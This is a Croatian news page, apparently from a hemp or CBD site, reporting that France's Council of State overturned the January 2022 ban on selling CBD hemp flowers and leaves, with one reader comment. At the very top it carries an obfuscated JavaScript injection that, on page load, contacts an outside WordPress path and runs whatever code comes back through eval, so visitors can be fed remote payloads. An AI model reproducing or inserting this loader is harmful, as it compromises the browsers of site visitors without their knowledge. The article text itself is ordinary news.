;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Francuska ukida zabranu prodaje cvijeća i lišća konoplje

U ponedjeljak, 24. siječnja, Državno vijeće Francuske ukinulo je zabranu cvjetova i listova konoplje koji sadrže CBD, a koja je na snazi ​​bila od 31. prosinca.

Na veliko iznenađenje industrije CBD-a, 30. prosinca 2021. francuska vlada izdala je naredbu o zabrani posjedovanja i prodaje biljke konoplje koja sadrži kanabidiol (CBD), a sljedećeg dana nacionalni dobavljači CBD-a bili su suočeni sa zabranom.

Prirodno ogorčena, industrija je poduzela hitne mjere, a ne obazirući se na praznike, 1. siječnja Union des Proffesionnels du CBD podnijela je sudsku zabranu protiv nove mjere. Tvrdili su da s obzirom na to da je Francuska država članica Europske unije, te da je unija klasificirala CBD kao ne-narkotik, u Francuskoj se CBD treba tretirati i regulirati kao takav.

Kao odgovor na ovu akciju, u petak, 14. siječnja, francuski Vrhovni sud presudio je u korist CBD industrije i privremeno suspendirao zabranu. U međuvremenu, Conseil d’État (Državno vijeće), koje je zaduženo za savjetovanje francuske vlade u vezi s zakonima i uredbama, imalo je zadatak detaljnije ispitati to pitanje.

Deset dana kasnije, 24. siječnja, vijeće je presudilo u korist industrije, uz obrazloženje da je zabrana doista bila nezakonita i nepotrebna. “Sudac u Conseil d’État smatra da postoji ozbiljna sumnja u zakonitost ove opće i apsolutne mjere zabrane zbog njezine nerazmjerne prirode”, stoji u odluci vijeća.

“Doista, ne čini se, na kraju kontradiktorne istrage i razmjena koje su se dogodile tijekom javne rasprave, da bi cvjetovi i listovi cannabis sativa L. čiji je sadržaj THC-a manji od 0,2 posto predstavljali stupanj štetnosti po zdravlje koja opravdava potpunu i apsolutnu mjeru zabrane: ovaj prag je upravo onaj koji je zadržan u samoj pobijanoj uredbi za karakterizaciju biljaka kanabisa dopuštenih za uzgoj, uvoz, izvoz i industrijsku uporabu.”

Tržište koje se širi

U međuvremenu, državi je također naloženo da isplati ukupan iznos od 13.000 eura za trinaest tvrtki podnositelja zahtjeva. Vjeruje se da je početkom 2021. u cijeloj zemlji bilo 400 CBD trgovina, a sada ih je otprilike četiri puta više. Promet sektora procjenjuju lokalni sindikati na milijardu eura, od čega se vjeruje da dvije trećine potječe izravno od sirovog cvijeća i lišća.

Choose your Reaction!
  • Mene zanima kad će i da li će se uopće dogoditi legalizacija kod nas, dakako dok sam još živ. Poslje mi neće značiti previše ;)

Leave a Comment